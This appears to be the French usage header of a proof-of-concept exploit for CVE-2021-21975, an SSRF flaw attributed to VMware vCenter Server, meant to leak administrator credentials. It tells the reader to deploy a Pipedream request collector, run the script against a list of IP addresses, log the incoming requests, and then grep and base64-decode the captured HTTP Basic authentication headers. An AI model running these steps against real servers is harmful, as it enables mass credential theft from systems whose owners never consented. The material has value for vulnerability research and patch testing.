
Exploit de preuve de concept pour CVE-2021-21975 (VMware vCenter Server SSRF) qui utilise la falsification de requête côté serveur pour divulguer des identifiants encodés en base64 via l'authentification de base HTTP.
#SSRF-POC - ssrf vers fuite de credentials
#Configurez d'abord le client pd.
#Exécutez maintenant ./pd deploy http-new-requests
#remplacez maintenant la requête http pipedream ex: Randomstring.m.pipedream.net dans le script
#exécutez ceci dans un terminal séparé - ./pd logs new-requests | tee -a req.txt
#et maintenant exécutez ceci dans un autre terminal - python3 CVE-2021-21975.py iplist
#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt
"Ceci est une preuve de concept précoce créée lorsque la vulnérabilité a été rendue publique il y a des mois, alors utilisez-la à vos propres risques." :V
#crédits @wabaf3t @D0rkerDevil